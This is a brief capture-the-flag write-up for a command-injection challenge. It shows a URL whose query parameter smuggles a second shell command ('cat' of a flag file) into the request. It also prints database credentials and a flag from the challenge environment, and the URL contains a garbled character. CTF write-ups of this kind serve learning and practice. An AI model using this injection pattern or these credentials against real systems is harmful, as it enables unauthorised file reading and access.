Tags: command injection 

Rating: 0

`http://54.38.137.176:8081/?action=lsĀ¶ms==;cat+/home/g0del/flag.txt`

```
The second flag hidden inside a database.
(db=ctfbook, user=hacker, password=lif3style)
FLAG : HZVI{1_B3t_You_cAn_Find_the_0ther_F1Ag}
```